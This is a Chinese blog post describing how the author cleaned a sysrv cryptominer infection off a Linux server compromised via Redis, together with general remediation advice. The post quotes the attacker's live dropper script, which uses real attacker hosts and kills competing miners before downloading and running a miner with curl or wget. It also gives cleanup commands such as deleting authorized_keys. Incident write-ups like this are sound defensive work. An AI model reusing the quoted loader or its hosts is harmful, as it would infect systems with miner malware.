被挖矿的烦恼

被挖矿的烦恼

真想早日看到比特币跳水

最近的挖矿热潮搞得显卡都买不着,买不着也就算了,将就以前的用得了,这两天测试用的服务器又莫名奇妙被植入了挖矿病毒,害得我又要花时间去处理这个东西。

感染原因

感染挖矿的原因基本上分为两种:

  • Redis
  • Docker

两种我都遇到过,Docker 被感染那次比较严重,由于带挖矿的容器挂载目录到宿主机,导致宿主机上很多原有文件夹和命令都被修改了,类似 top 命令,根本找不到 CPU 占用较高的程序,而我自己对 Linux 系统不够熟悉,最后只能重装解决。

Redis 遇到的几次相对来说还是比较好解决,都是固定套路了

挖矿程序查找

先不急着找问题进程,先查找定时任务

crontab -e

发现原本的任务都被清空了,只剩一个往指定地址下载并执行 Shell 脚本的任务

//脚本地址
http://45.145.185.85/ldr.sh

复制地址到浏览器发现内容如下

cc=http://finalshell.nl
sys=sysrv003

# kill old files
pkill -9 "^network01$"; pkill -9 sysrv001; pkill -9 "^sysrv$"

get() {
    chattr -i $2; rm -rf $2
    curl -fsSL $1 > $2 || wget -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));" || cd1 -fsSL $1 > $2 || wd1 -q -O - $1 > $2
    chmod +x $2
}

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
    get $cc/sysrv $sys; nohup ./$sys 1>/dev/null 2>&1 &
fi

得知 /tmp 目录下放有问题文件,此外通过脚本中 pkill 命令又抓到挖矿程序守护进程的尾巴

着手清除

第一步需要清理定时任务了,定时任务需要清理两个地方

crontab -e
cd /etc/cron.d
//然后清理问题文件

第二步需要清理 `authorized_keys

rm -rf /root/.ssh/authorized_keys

第三步需要清理 /tmp 目录文件,这时大概率提示

rm: cannot remove '***': Operation not permitted

需要使用 chattr 命令

chattr -i (问题文件名)

有一次遇到挖矿程序把 chattr 给删除了,yum 命令也安装不了,最后是复制其他正常的服务器的 chattr 文件解决的

第四步借用挖矿脚本的命令,杀掉可疑守护进程

pkill -9 "^network01$"; pkill -9 sysrv001; pkill -9 "^sysrv$"

第五步找到问题进程,然后杀掉该进程

基本上到这里就解决了

其他

看其他解决挖矿程序的文章是下载了一些辅助工具,我个人对这块不熟,只会用一些基本的命令,这里推荐下 ps -ef 命令,可以着重看定时任务是否被清除干净

如果您的 Linux 系统被入侵并被用于挖矿,以下是一些解决方法: 1. 切断与恶意行为的连接:首先,您应该立即中断被入侵系统与外部恶意服务器的连接。您可以使用防火墙或网络设备来阻止与恶意服务器的通信。 2. 停止挖矿进程:查找并停止正在运行的挖矿进程。可以使用命令 `ps aux | grep miner` 或 `top` 来查找并终止挖矿相关的进程。如果您知道具体的挖矿进程名称,也可以直接使用 `kill` 命令来终止进程。 3. 清理恶意软件:查找并删除与挖矿相关的恶意软件。您可以使用命令 `find / -name <file_name>` 来查找文件名包含指定字符的文件,然后手动删除这些文件。 4. 更新和修补系统:确保您的 Linux 系统和相关软件都是最新版本,并应用安全补丁。这有助于修复已知的安全漏洞,减少入侵的风险。 5. 检查系统日志:检查系统日志文件,查找与入侵和挖矿相关的异常行为。常见的日志文件包括 /var/log/auth.log、/var/log/syslog 等。分析这些日志可以帮助您了解入侵的来源和方式。 6. 强化安全措施:采取额外的安全措施来保护您的系统,如使用强密码、启用防火墙、限制远程访问、使用安全软件等。确保您的系统和应用程序都有合适的安全配置。 7. 进行系统扫描和恢复:可以使用安全软件或工具对系统进行全面扫描,以查找和清除潜在的恶意文件和后门。还可以恢复受影响的文件和配置,以确保系统正常运行。 请注意,上述措施可能需要一定的专业知识和技术能力。如果您对此不太熟悉,建议寻求专业人士的帮助,如网络安全专家或系统管理员。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值